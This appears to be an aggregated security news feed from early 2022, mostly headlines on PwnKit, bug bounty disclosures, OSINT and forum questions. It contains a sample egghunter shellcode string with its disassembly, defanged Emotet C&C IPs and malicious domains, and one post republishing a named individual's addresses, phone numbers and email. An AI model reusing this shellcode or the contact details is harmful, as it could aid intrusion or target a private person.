    Day 19, Web Reconnaissance Or Information Gathering — Part 4#100DaysofHacking
    Get all the writeups from Day 1 to 17, Click Here Or Click Here.  ( 3 min )
  • Open

    Improper access control for users with expired password, giving the user full access through API and Git
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1285226 - Bounty: $950
    subdomain takeover on fddkim.zomato.com
    Zomato disclosed a bug submitted by mosec9: https://hackerone.com/reports/1130376 - Bounty: $350
  • Open

    This subreddit in the WayBack Machine.
    https://web.archive.org/web/*/https://www.reddit.com/r/opendirectories/ https://web.archive.org/web/*/https://old.reddit.com/r/opendirectories/ ​ submitted by /u/EmuAnon34 [link] [comments]  ( 1 min )
  • Open

    CyberSoc | Cyber Detective CTF Write Up — Evidence Investigation
    OSINT-focused CTF Challenges. OSINT in Goverment, Stego, Crypto multiple languages, WIFI, EXIF and more Continue reading on Medium »  ( 4 min )
  • Open

    [Cullinan #26] Add XXE (XML External Entity)
    컬리넌 로그 #26입니다. XXE 항목 추가하였습니다. 보통 컬리넌에 여러개 이력이 누적되면 올리려곤 하는데, 이번에는 텀이 좀 길어져서 로그로 올려봅니다. XXE 내용 중 대응방안 쪽은 OWASP가 워낙 잘 정리해서 거의 링크 하나로 대체된 상태인데, 요건 제가 따로 한번 더 자세히 정리해서 업데이트하도록 할게요 😅 Add XXE (XML External Entity)
  • Open

    Exposing FBI's Most Wanted Iran's Mabna Hackers - An OSINT Analysis
    Dear blog readers, In this post I've decided to share actionable intelligence on the online infrastructure of FBI's Most Wanted Iran's Mabna Hackers for the purpose of assisting everyone in their cyber attack and cyber threat actor attribution campaigns. mlibo[.]ml blibo[.]ga azll[.]cf azlll[.]cf lzll[.]cf jlll[.]cf elll[.]cf lllib[.]cf tsll[.]cf ulll[.]tk tlll[.]cf libt[.]ga libk[.]ga libf[.]ga libe[.]ga liba[.]gq libver[.]ml ntll[.]tk ills[.]cf vtll[.]cf clll[.]tk stll[.]tk llii[.]xyz lill[.]pro eduv[.]icu univ[.]red unir[.]cf unir[.]gq unisv[.]xyz unir[.]ml unin[.]icu unie[.]ml unip[.]gq unie[.]ga unip[.]cf nimc[.]ga nimc[.]ml savantaz[.]cf unie[.]gq unip[.]ga unip[.]ml unir[.]ga untc[.]me jhbn[.]me unts[.]me uncr[.]me lib-service[.]com unvc[.]me untf[.]me nimc[.]cf anvc[.]me ebookfafa[…
    Exposing Behrooz Kamalian's Ashiyane ICT Company - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone some practical and actionable threat intelligence information regarding members of the Ashiyane Digital Security Team also known as Behrooz Kamalian's Ashiyane ICT Company for the purpose of assisting everyone in their cyber attack and cyber attack attribution campaigns. Name: Behrooz Kamalian Postal address: Tajrish Sq, Fana Khosro St,Amir Salam Alley,No 22, Ashiyane ICT Company Phone number: 22727284-5 Fax number: 22727283 email: nima.salehi@yahoo.com Technical Handle: nic36928h37 Name: Behrooz Kamalian email: nima.salehi@yahoo.com Domain Name: ashiyane.ir Legal Holder: Behrooz Kamalian Postal address: Unit 28, Floor Seven, 36 Building , Daneshvar alley, Jamalzadeh St. , Enghelab Sq. Tehran, IR 1336925748 Phone number: +98.2166935551 Fax number: +98.2166930577 Admin Contact: nic36928h37 Technical Contact: nic36928h37 Domain Name Server1: ns1.ashiyane.org Domain Name Server2: ns2.ashiyane.org Request Date: 29 December 2005 Last Verification: 21 September 2006 Reseller: Govah Tadbir Rayaneh Postal address: Unir 1 , 1th Floor , No.376 , North Bahar St . Phone number: +98 21 88849956-7 Fax number: +98 21 88307682 email: info@tadbir.ir
    Profiling the Emotet Botnet C&C Infrastructure - An OSINT Analysis
    Dear blog readers, I've decided to share a recently obtained Emotet botnet C&C server IPs for the purpose of empowering everyone with the necessary technical information on their way to track down and monitor the botnet including to possibly assist and help where necessary in terms of cyber attack campaign attribution including cyber threat actor attribution campaigns. Sample currently active Emotet botnet C&C server IPs: hxxp://109[.]123[.]78[.]10 hxxp://66[.]54[.]51[.]172 hxxp://108[.]161[.]128[.]103 hxxp://195[.]210[.]29[.]237 hxxp://5[.]35[.]249[.]46 hxxp://5[.]159[.]57[.]195 hxxp://206[.]210[.]70[.]175 hxxp://88[.]80[.]187[.]139 hxxp://188[.]93[.]174[.]136 hxxp://130[.]133[.]3[.]7 hxxp://162[.]144[.]79[.]192 hxxp://79[.]110[.]90[.]207 hxxp://72[.]18[.]204[.]17 hxxp://212[.]129[.]13[.]…

  • Open

    ZAP vs Burpsuite in my mind at 2022
    Hi :D I’m going to compare ZAP and Burpsuite after a long time. Of course, it’s extremely subjective, so I hope you light enjoy it. 📌 TL;DR ZAP has powerful scripting engine and automation Burpsuite has powerful scanning engine and That’s Early adopter. They’re both really cool tools. 🔍 Compare ZAP Burpsuite Proxy O , HTTP/1.1 O🎖 HTTP/1.1 , HTTP/2 Paasive Scan O O Active Scan O O Scan Configuration O🎖, Easy, Detail control O Scan Results O, Mapping more information O, Detail results Live Scan O, ATTACK Mode O, Live tasks Manage scope O, Detail O, Easy Manage workspace O O Spidering O, Spider, Ajax Spider O, Powerful Crawler Extensions (Addons) O, High quality O🎖, High quality, Many features Scripting O🎖, Zest 👍, Ruby, Python, JS, Groovy, Etc O, Python, Ruby Performance O, Fast, bu…
    XXE (XML External Entity)
    🔍 Introduction XXE(XML External Entity)는 XML을 Parsing하여 사용하는 서비스에 악의적인 XML 구문을 Parsing하도록 유도하여 공격자가 의도한 동작을 수행하도록 하는 공격입니다. 기본적으로 XML Parser가 위치한 곳에서 부터 영향력이 발생하기 때문에 가볍게는 SSRF 같이 내부망 접근부터, RCE까지 큰 영향력을 가질 수 있습니다. 🗡 Offensive techniques Detect 심플하겐 XML Parse가 동작하는 구간을 찾아야합니다. 소스코드를 볼 수 있는 상황이라면 코드에서 검색하는 것이 가장 빠르고 효율적이며, 소스코드 없이 순수하게 동작만으로만 봐야한다면 .xml 파일을 인자값으로 받거나, 에러에서 XML Parsing 관련 에러를 뱉는 구간을 위주로 점검해야합니다.
  • Open

    Pwnkit: How to exploit and check
    submitted by /u/DevSec23 [link] [comments]
    Reversing ALPHV (aka BlackCat): Rust-Based Ransomware
    submitted by /u/rsobers [link] [comments]
    Bypassing Little Snitch Firewall with Empty TCP Packets
    submitted by /u/hackers_and_builders [link] [comments]
    Perfect wordlist to discover directories and files on target size with tools like ffuf.
    submitted by /u/mexhanical [link] [comments]  ( 1 min )
    wholeaked: a file-sharing tool that allows you to find the responsible person in case of a leakage
    submitted by /u/utku1337 [link] [comments]  ( 2 min )
    AD CS: weaponizing the ESC7 attack - BlackArrow
    submitted by /u/apanonimo [link] [comments]
    Self-contained exploit for CVE-2021-4034 (Pkexec 1-day LPE)
    submitted by /u/ly4k_ [link] [comments]
    Exploit for CVE-2021-4034 that does not leave syslog entries
    submitted by /u/hermajordoctor [link] [comments]
    Webcam Hacking (again) - Safari UXSS
    submitted by /u/Straight_Finding_756 [link] [comments]
  • Open

    [Question] Using Shodan or another 'search engine' to find MS SQL servers
    Is it possible to use Shodan or another engine to find public facing SQL servers, more specifically, if you know of a database name, could it be found? I realize MS SQL has some default ports, and I can search for those, but I'm curious to know if its possible to search for a database name, too. TIA. submitted by /u/Drivingmecrazeh [link] [comments]  ( 1 min )
    Password cracking options..
    What do you think is a great password cracking tool? A pen tester on my team asked me to crack a few passwords and NTLM hashes. I'm new to the team and when the other guy left he wiped everything so the only thing I know we had was PRTK which is a POS in my opinion. I downloaded hashcat but feel like I'm missing something to make it more efficient. Before I spend too much time trying to improve hashcat, what do you use? What's the price of it? submitted by /u/Korgibot [link] [comments]  ( 1 min )
    What does a booter/stresser site need to do in order to be legal?
    Ive seen tons of these booter projects and am aware that under certain circumstances the websites themselves are completely legal. what separates Redwolf, from other DDoS sites you find all around in terms of legality. I understand that Redwolf is used legally and the other ones usually arent but what makes the website itself from being legal or illegal? submitted by /u/raultheuniverse [link] [comments]  ( 1 min )
    Accidentally DIRBed the wrong site
    I was playing around with dirb and was going to run it on a private test site but had a typo and accidentally ran it on an actual website and didn't realize for a few minutes that I had messed it up. Should I reach out to site administrator or be concerned or is it ok? EDIT: Lmfao at the comments keep them coming submitted by /u/Mesachi_06 [link] [comments]  ( 2 min )
    Sitting through Offsec 2-3 day exams
    I'm wondering what people with full time jobs and kids are doing about the Offsec courses with 2-3 day exams. Are you just biting the bullet and taking the exam or just taking the training and not taking the exam? After OSCP I've been just taking the Offsec trainings and going over material, but without a goal like taking an exam and getting the certification there's very little motivation to study the material. I usually go over the pdf to pick up some new tricks and move on. After full day of work and family I don't even know when to find 2-3 days straight to do the exam. I still don't understand why Offsec doesn't change the exams to 5 days and let people do it like it's done in a real world instead of putting unnecessary pressure with ctf style exam time frame. Also when I took OSCP exam I didn't have to deal with being monitored. I get up from computer chair every 20 minutes and I can see getting annoyed about having to deal with this for 2-3 days pretty fast. submitted by /u/ravenoverflow [link] [comments]  ( 5 min )
  • Open

    A brief overview of JWT and its exploits
    Introduction Continue reading on System Weakness »
    A brief overview of JWT and its exploits
    Introduction Continue reading on Medium »
    Beginner Bug Bounty Guide - Part 4
    Previous : Beginner Bug Bounty Guide - Part 3 Continue reading on Medium »  ( 2 min )
    Beginner Bug Bounty Guide - Part 3
    Previous : Beginner Bug Bounty Guide - Part 2 Continue reading on Medium »
    How to spoof e-mails. (DMARC, SPF, and Phishing)
    Note: sanitization of these screenshots was performed to protect the identities of stakeholders involved. Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - DIRECTORY TRAVERSAL LAB ÇÖZÜMLERİ
    Directory Traversal (Dizin-Dosya Geçişi), saldırganların bir web sunucusundaki kısıtlı dizinlere erişmesine ve web sunucusunun kök dizini… Continue reading on Medium »  ( 3 min )
  • Open

    Redis – Vulnerability Disclosure Program
    Article URL: https://hackerone.com/redis-vdp Comments URL: https://news.ycombinator.com/item?id=30091276 Points: 2 # Comments: 0
    Local privilege escalation vulnerability in polkit’s pkexec
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30086222 Points: 2 # Comments: 0  ( 8 min )
    PwnKit: Local Privilege Escalation Vulnerability Discovered in Polkit’s Pkexec
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30086204 Points: 1 # Comments: 0  ( 7 min )
    Android security tool APKLeaks patches critical vulnerability
    Article URL: https://portswigger.net/daily-swig/android-security-tool-apkleaks-patches-critical-vulnerability Comments URL: https://news.ycombinator.com/item?id=30085811 Points: 1 # Comments: 0  ( 3 min )
    Local privilege escalation vulnerability in polkit’s pkexec (CVE-2021-4034)
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30081671 Points: 1 # Comments: 0  ( 8 min )
    PwnKit: Vulnerability in Polkit (CVE-2021-4034)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30081666 Points: 5 # Comments: 0  ( 7 min )
  • Open

    Password cracking tools
    What do you think is a great password cracking tool? A pen tester on my team asked me to crack a few passwords and NTLM hashes. I'm new to the team and when the other guy left he wiped everything so the only thing I know we had was PRTK which is a POS in my opinion. I downloaded hashcat but feel like I'm missing something to make it more efficient. Before I spend too much time trying to improve hashcat, what do you use? submitted by /u/Korgibot [link] [comments]  ( 1 min )
    Timeline from MFTECmd VS plaso & log2timeline
    I was taught these 2 methods of creating timelines from MFT. I am familiar with using the timeline output from MFTECmd. Is there a reason I should be using timeline from plaso & log2timeline? Are there benefits or details there I could miss from using MFTECmd? Because it seems slightly more tedious to generate timeline using plaso & log2timeline. Comments from those who use both? submitted by /u/bangfire [link] [comments]  ( 1 min )
    Encase Endpoint
    Any users of this product? How useful do you think it is? Have any real competitors popped up? (I've heard Symantec mentioned) I've heard some former customers say it was 10x+ cheaper than running multiple physical extractions with a large consultant submitted by /u/Nick_Investor [link] [comments]  ( 1 min )
  • Open

    AD CS: weaponizing the ESC7 attack - BlackArrow
    submitted by /u/gid0rah [link] [comments]
    chvancooten/NimPackt-v1: Nim-based assembly packer and shellcode loader for opsec & profit
    submitted by /u/dmchell [link] [comments]
    Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA
    submitted by /u/SCI_Rusher [link] [comments]
    Hacktivist group shares details related to Belarusian Railways hack
    submitted by /u/dmchell [link] [comments]
  • Open

    10 GiB of Classic music in FLAC or APE format
    https://funambule.org/classique/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
    How can I stop getting my WiFi flagged??
    My network provider (or rather Warner Bros.) has flagged a download that I attempted for Dune (the 2021 movie). I wanna know how I can stop having my WiFi's address flagged for DMCA claims. submitted by /u/Raven_Claw7621 [link] [comments]  ( 1 min )
    AU/NZ/CA - TV & movie archive
    submitted by /u/vsharer [link] [comments]
    rotary telephones
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Sooooo..... What happened to the Homeland Security post?
    be me see post click and see files nope the fuck out of there.... submitted by /u/ringofyre [link] [comments]  ( 1 min )
  • Open

    【安全通报】Linux Polkit本地权限提升漏洞(CVE-2021-4034...
    近日,网络上出现 Linux 下 Polkit 工具集的本地权限提升漏洞,任何非特权本地用户可通过此漏洞获取root权...
  • Open

    【安全通报】Linux Polkit本地权限提升漏洞(CVE-2021-4034...
    近日,网络上出现 Linux 下 Polkit 工具集的本地权限提升漏洞,任何非特权本地用户可通过此漏洞获取root权...
  • Open

    CVE-2022-0185: Container+Kubernetes manifest as crash POC
    Article URL: https://github.com/discordianfish/cve-2022-0185-crash-poc/blob/main/crash.c Comments URL: https://news.ycombinator.com/item?id=30087809 Points: 1 # Comments: 0  ( 1 min )
    Local privilege escalation vulnerability in polkit’s pkexec (CVE-2021-4034)
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30081671 Points: 1 # Comments: 0  ( 8 min )
    PwnKit: Vulnerability in Polkit (CVE-2021-4034)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30081666 Points: 5 # Comments: 0  ( 7 min )
  • Open

    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and… Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    SecWiki News 2022-01-26 Review
    2021年度高级威胁研究报告 by ourren [HTB] Safe Writeup by 0x584a 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-26 Review
    2021年度高级威胁研究报告 by ourren [HTB] Safe Writeup by 0x584a 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    老版OSCP准备及考试经验
    本人于2021年12月通过了OSCP考试,由于OSCP考试于2022年1月11号改革, 文中考试经历部分的参考价值就不大了; 干货和备战部分还是可以参考一下  ( 1 min )
    FreeBuf早报 | Linux系统爆出新漏洞,影响所有版本;Segway 电子商店被攻击
    Polkit的pkexec 组件中存在一个安全漏洞(CVE-2021-4034),这意味着几乎所有的Linux 发行版的默认配置都包含此漏洞,攻击者可通过该漏洞获得系统的root权限。  ( 1 min )
    基于钓鱼攻击的技术点研究
    钓鱼思路学习研究。  ( 1 min )
    如何使用Yakit进行流量劫持
    yakit基本实现了burp劫持和抓包的功能,在具体使用场景上也能基本覆盖,作为刚起步不久的开源项目,希望大家多多关注~  ( 1 min )
    严重的编程错误或致文件删除、黑客使用新恶意软件逃避检测|1月26日全球网络安全热点
    Rust编程语言的维护者发布了一个针对高严重性漏洞的安全更新,该漏洞可能被恶意方滥用,以未经授权的方式从易受攻击的系统中清除文件和目录。  ( 1 min )
    如何使用FaPro批量模拟设备
    通过FaPro,可以使用一条命令,直接创建一个虚拟网络,并在其中模拟多个不同的设备。  ( 1 min )
    《中国企业网络安全意识教育现状与发展报告》发布
    《中国企业网络安全意识教育现状与发展报告》(以下简称《报告》)近日发布。  ( 1 min )
    《银行保险机构信息科技外包风险监管办法》发布,严控机构外包风险
    《办法》共7章46条,对银行保险机构信息科技外包风险管理提出全面要求。
    【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁
    本文从Rootkit的生存期、可达成的效果,以及运用这项技术展开攻击的可行性等角度展开讨论。  ( 1 min )
    《浙江省公共数据条例》将于3月1日执行,再次强调个人信息安全
    《条例》共五十一条内容,明确提出打造公共数据平台,建立公共数据共享机制,构建公共数据有序开放制度。
    首届「网安新势力」大会专家评委团正式公开
    14位网络安全行业专家评委,快来一睹真容!
  • Open

    Specific Payload makes a Users Posts unavailable
    FetLife disclosed a bug submitted by castilho: https://hackerone.com/reports/1176794 - Bounty: $100
  • Open

    ROP Hello World!
    submitted by /u/Kubiszox [link] [comments]
  • Open

    Ethical Hacking — Buffer Overflow Parte 2
    Fuzzing é uma técnica de teste de software que fornece dados inválidos, ou seja, dados inesperados ou aleatórios como entrada para um… Continue reading on Medium »  ( 2 min )
  • Open

    Ethical Hacking — Buffer Overflow Parte 2
    Fuzzing é uma técnica de teste de software que fornece dados inválidos, ou seja, dados inesperados ou aleatórios como entrada para um… Continue reading on Medium »  ( 2 min )

  • Open

    Is there anything equivalent to javas requestdispatcher.forward system in other programming languages?
    Its the easiest thing to leverage for pre auth bugs just looking at web.xml and leveraging internal forwards to touch apis that normally require auth and I would love to find something similar in other languages. The closest thing ive found is a special type of open redirect where the devs decided to keep previous session data making it useful for auth bypasses in some php projects. See the thing is open redirects usually kill previous session data making them useless for auth bypassing on their own and the java forward system is like an internal version/server sided version of a redirect that keeps session data and forwards everything along intact. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Could blind mass assignment be a rare type of bug?
    Some people know it as reflection binding, mass assignment or insecure direct object mapping which is the opposite of insecure direct object reference your basically writing data instead of reading it or appending data. So ive noticed in some places ill send hidden parameters and the json response won’t show anything interesting but ill refresh the page and ill get like a discount or something say I add the parameters isSpecialDiscount: true the response won’t show anything related so its a blind mass assignment bug and in some cases ive seen partial blind mass assignment where the json response will change to true for some things but still say false for others despite the request setting it as true but when I refresh the page the server grants me the discount proving its processing the input and assigning my session a discount. Ive never really seen people discuss blind or partial blind mass assignment being a thing but im finding them a lot more now its weird. Usually I used to look at the json response to see if parameter values are changing but I now see I can’t even trust that completely to prove a mass assignment bug exists. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Anyone who works in a SOC dealing with disadvantages in maturing due to lack of management experience?
    Just curious how some of you guys who work in a SOC, whether it’s as an analyst or engineer, with a manager who doesn’t have the background. Do you have a lot of influence in shaping the SOC? Run in to roadblocks justifying tools or maybe maturing your processes? submitted by /u/bankster24 [link] [comments]  ( 2 min )
    Looking for first steps in changing careers with an unrelated(?) master's degree
    Hello /r/AskNetsec, this is my first post on here. I recently (coming up on a year) graduated with a M.A. in Forensic Psychology and Intelligence Analysis. This degree is not opening the doors in the psychology field I was hoping it would, and quite frankly, the work I have done in this field is not what I wanted out of my career. I have always been fascinated by cybersecurity, and it is a large part of the reason I decided to pursue the Intel part of my degree. My question to you all is this: What first steps would someone in my position take in trying to get into the Cybersecurity field? Ideally I would like to eventually work my way to a Security Analyst position. I have no qualms about starting at the lowest positions to work my way up, but am clueless on where to start. I have some coding knowledge in Python and Java, but as far as IT knowledge I am a total newbie. Are there certifications or courses I should prioritize? I would like to avoid going back to a university setting, as I have spent enough time and money doing that for the time being. Thank you to anybody who reads this and decides to respond, I really appreciate it. submitted by /u/Lambeau_Leap [link] [comments]  ( 1 min )
    Worth getting Net+/Sec+ with 3 years of exp in Blue Teaming?
    Heyhey, I'm not quite new to blue teaming (threat hunt & detection) but would like to have my options open in case I want to jump to a more senior tech role in the next year or so. I have a computer engineering degree and a SANS 401 (GSEC) cert too. Do you think it's worth getting? Thanks! submitted by /u/youmakemismile [link] [comments]  ( 1 min )
    Do RSA key fobs really strengthen security?
    Originally they did, I know. But there was this story about Chinese hackers compromising RSA, getting into the deepest levels of the production and key generation process. As a result, RSA alerted each and every customer of theirs and told them to use a personal PIN together with the code generated by the key fob. This is what I'm doing now on a daily basis. Now you have: your account password your PIN you use together with the RSA-generated code and the RSA-generated code The RSA codes are compromised and you have to assume that there's some people out there knowing all the codes and algorithms. But that means they really aren't worth much, basically you only have a password and another, limited password called PIN - which is usually shorter and numbers only. The most you can expect from this is that - let's say - 10 characters alphanumeric + 6 digits is somewhat better than just the 10 characters alphanumeric, plus there's a good chance that they are stored in different systems, so less likely to seized at the same time by some black hats. Is that true or do these key fobs still have an added value? submitted by /u/mshthn [link] [comments]  ( 2 min )
    Simple question about nmap
    If my friend tells me what his public IP address is and I use nmap to do a port scan on his public IP address, then what exactly is being port scanned? Since every device in his house will have the same public IP address. submitted by /u/LagunaLoireFF8 [link] [comments]  ( 2 min )
    Received H1 bug bounty but think I maybe should have gotten more. Am I just being greedy?
    I have received a bounty just under 20k. I understand that that’s a lot of money but I am curious from experts whether this is about the most I’ll get and I should just move on. I can’t disclose too much but I found a way to make myself very very rich very easily (no actual tools or request spoofing required). I’ve thought of some ways that one could have theoretically easily taken the free money with no trace and ran if they were a legitimate crook. The bug had been around for a while (Longer than a week). Unsure of how bad it was in terms of actual internal damages. I can honestly say that I probably saved them potential millions if not actual millions. It feels like the amount I received is honestly not much at all given the severity of it. Having said all of that, it wasn’t very hard to reproduce. It was less of a penetration report involving much skill and more of a “holy shit guys, your product is clearly broken and I can’t believe this hasn’t been patched” Am I being completely unreasonable/greedy? I should also note that their market cap is far into the billions which is why I am making this post to begin with. They’re a major industry leader. submitted by /u/csthrowawayyyy [link] [comments]  ( 4 min )
    Is an associates degree worth getting?
    I was told experience and certs are mostly required for most jobs aside from roles in management, which requires a BS or even masters. So I am just curious if there is any value in just getting an AS. The role that currently interests me is SOC analyst if that helps. I also heard of the WGU online program for a BS or masters in cybersecurity. If I plan on doing management in the future, is it worth getting my degree through this program? submitted by /u/RaZdoT [link] [comments]  ( 2 min )
  • Open

    How “Docker” can help you become a better hacker
    Continue reading on Medium »
    Ensuring protocol security with Immunefi bug bounty program
    Calling all devs and hackers. Help enhance our smart contract security and prevent thefts, freezes, and unintended changes and earn. Continue reading on Medium »  ( 2 min )
    I found a way to extract passwords from any iOS device. When I reported it to Apple? Silence.
    Apple’s Bug Bounty program, in theory, incentivizes programmers to report flaws they find in the company’s code. In practice? Not so much. Continue reading on Medium »  ( 3 min )
    What I learnt from reading 220* IDOR bug reports.
    IDOR — Insecure Direct Object Reference, abuse of the lack of authentication at every stage. Continue reading on Medium »  ( 3 min )
    First Bounty! Disable 2FA of any user via OTP bypass
    Getting that first bug bounty is a special feeling for any bug hunter. This is my first write up so please bear with me. Continue reading on Medium »  ( 1 min )
    First Valid BUG Finding At Microsoft And I Got the Acknowledgments Page Microsoft
    Hi Everyone. Continue reading on Medium »  ( 2 min )
    How I could have read your confidential bug reports by simple mail?
    Hey Everyone, Hope you’re doing safe and sound. Continue reading on InfoSec Write-ups »  ( 2 min )
    How I was able to takeover accounts in websites deal with Github as a SSO provider
    Introduction Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    pwntools on m1 mac?
    Hello, I'm working on creating a tutorial binary exploit for an m1-based mac. For simplicity and portability i'm using an M1-based Kali VM and trying to use aarch64 shellcraft but getting weird errors and wondering if anyone has successfully gotten pwn to work for them? ​ Main error message when trying to use asm() on a shellcraft payload is: pwnlib.exception.PwnlibException: Could not find 'as' installed for ContextType() Try installing binutils for this architecture: https://docs.pwntools.com/en/stable/install/binutils.html ​ but dont know what binutils arch it's expecting, i tried installing a couple to no avail. ​ appreciate any of yall's time thanks submitted by /u/superiorpyre [link] [comments]  ( 1 min )
    Fuzzing Ethereum Smart Contract using Echidna - Blockchain Security #1
    submitted by /u/pat_ventuzelo [link] [comments]
    Shellcode to x86, x64 Assembly
    Sharing a quick python3 command line tool I made to disassemble shellcode without having to remember the nuances of python2 v python3 strings and writing to a file each time: https://gitlab.com/stormblest/exploit-dev-tools/-/blob/main/shellcode2asm.py Includes python unittests in Gitlab. Example: ``` $ python3 shellcode2asm.py "\xbb\x90\x50\x90\x50\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2" -a 32 shellcode: "\xbb\x90\x50\x90\x50\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2" 00000000 BB90509050 mov ebx,0x50905090 00000005 31C9 xor ecx,ecx 00000007 F7E1 mul ecx 00000009 6681CAFF0F or dx,0xfff 0000000E 42 inc edx 0000000F 60 pusha 00000010 8D5A04 lea ebx,[edx+0x4] 00000013 B021 mov al,0x21 00000015 CD80 int 0x80 00000017 3CF2 cmp al,0xf2 00000019 61 popa 0000001A 74ED jz 0x9 0000001C 391A cmp [edx],ebx 0000001E 75EE jnz 0xe 00000020 395A04 cmp [edx+0x4],ebx 00000023 75E9 jnz 0xe 00000025 FFE2 jmp edx ``` submitted by /u/blutitanium [link] [comments]  ( 1 min )
  • Open

    Able to steal private files by manipulating response using Auto Reply function of Lark
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1387320 - Bounty: $2000
    Able to steal private files by manipulating response using Compose Email function of Lark
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1373784 - Bounty: $2000
    Subdomain Takeover
    Mail.ru disclosed a bug submitted by official_dhivish: https://hackerone.com/reports/1348504
    Cross site scripting via file upload in subdomain ads.tiktok.com
    TikTok disclosed a bug submitted by blubluuu: https://hackerone.com/reports/1433125 - Bounty: $500
  • Open

    Watering hole deploys new macOS malware, DazzleSpy, in Asia
    submitted by /u/dmchell [link] [comments]
    Extracting Cobalt Strike Beacon Configurations - Elastic Security Research
    submitted by /u/dmchell [link] [comments]
    RBCD WebClient attack | Franky's WebSite
    submitted by /u/dmchell [link] [comments]
    hlldz/RefleXXion: RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks
    submitted by /u/dmchell [link] [comments]  ( 1 min )
  • Open

    Major Linux PolicyKit security vulnerability uncovered: Pwnkit
    Article URL: https://www.zdnet.com/article/major-linux-policykit-security-vulnerability-uncovered-pwnkit/ Comments URL: https://news.ycombinator.com/item?id=30077665 Points: 7 # Comments: 0  ( 4 min )
    Rust vulnerability enables attackers to delete files and directories
    Article URL: https://developer-tech.com/news/2022/jan/24/rust-vulnerability-enables-attackers-delete-files-and-directories/ Comments URL: https://news.ycombinator.com/item?id=30072868 Points: 5 # Comments: 1  ( 4 min )
    Dark Souls servers taken down following discovery of critical vulnerability
    Article URL: https://arstechnica.com/information-technology/2022/01/dark-souls-servers-taken-down-following-discovery-of-critical-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30069692 Points: 3 # Comments: 0  ( 2 min )
  • Open

    pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    submitted by /u/TheSwedishChef24 [link] [comments]
    Mind Your Dependencies: Defending against malicious npm packages
    submitted by /u/SRMish3 [link] [comments]
    We purchased a machine from China and it came with malware preinstalled
    submitted by /u/lormayna [link] [comments]  ( 2 min )
    Cracking Randomly Generated Passwords
    submitted by /u/hyperreality_monero [link] [comments]  ( 1 min )
    RBCD attack & defense. From Domain User to DA on default domain controllers settings. Including webclient service activation
    submitted by /u/k3nfr4 [link] [comments]  ( 1 min )
    Finding vulnerabilities in Swiss Post’s future e-voting system - Part 1
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    Recovering redacted information from pixelated videos
    submitted by /u/breakingsystems [link] [comments]  ( 1 min )
    Solarwinds Web Help Desk: When the Helpdesk is too Helpful
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    Article URL: https://seclists.org/oss-sec/2022/q1/80 Comments URL: https://news.ycombinator.com/item?id=30077271 Points: 112 # Comments: 41  ( 5 min )
    Pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    Article URL: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Comments URL: https://news.ycombinator.com/item?id=30075993 Points: 4 # Comments: 2  ( 5 min )
  • Open

    3 outils à connaître absolument pour la recherche d’information
    Durant une recherche sur internet, nous tombons souvent sur des formats de données qui sont à première vue inexploitables directement. Continue reading on Medium »  ( 3 min )
    Python: Speech To Text Conversion
    Simple Python code for converting audio data to text format Continue reading on Medium »  ( 1 min )
    Ukraine: tracking the deployments
    Making sense of the open source intelligence Continue reading on HOW TO STOP FASCISM »
  • Open

    Trainings or Courses or Labs?
    Howdy all, Any idea where I can find the following for Memory Forensics? I’m trying my best to learn the most of Memory Forensics! Have completed the Cyber Defenders lab! Free or Minimal Cost one would be appreciated as I’m just a beginner in my field! Thanks! submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    ftk Imager gets hung
